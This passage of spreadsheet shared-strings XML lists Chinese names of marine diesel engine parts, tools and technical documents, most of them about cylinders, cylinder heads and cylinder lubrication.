  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸单元总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸定位销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸分支润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖，加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖，螺栓等</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖，水密</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖，研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖侧视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖淡水出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖顶部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖顶部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖顶部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前试图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖顶部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仰视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖防护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖冷却水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖冷却水接口安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖上部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横截面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖首次生产质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖支架安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖中的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Quaertz</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滚筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油管支座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油加压泵单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸滑油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-Y56</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸或增压器停止运转</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸磨损监测系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸曲柄箱工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸曲拐箱，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸燃油进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸燃油限制弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸上推</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸设计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套臂温测量装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套波纹加工机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套和气缸体面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套质量控制说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸套质量说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体，其余部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体建议书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸体清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸销钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸油加热柜</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器，详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器电路图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器及调速器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器接线箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸注油器数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸装置更换套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸状态报告</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气鼓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气水分离企器数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气水分离器规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体出口壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体弹簧活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体块管路</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体喷射阀工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体吸入壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气体吸收装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸盖安全环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸盖螺栓或贯穿螺栓裂纹时运转</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸控制单元配线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸润滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸油电热管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸油管电加热</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽缸状况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>千分表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>千分尺</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>千分卡头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>牵引螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>牵引头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铅板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铅板，合金</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铅基轴承的质量说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后法兰，凸轮用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前板总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前部轴管密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
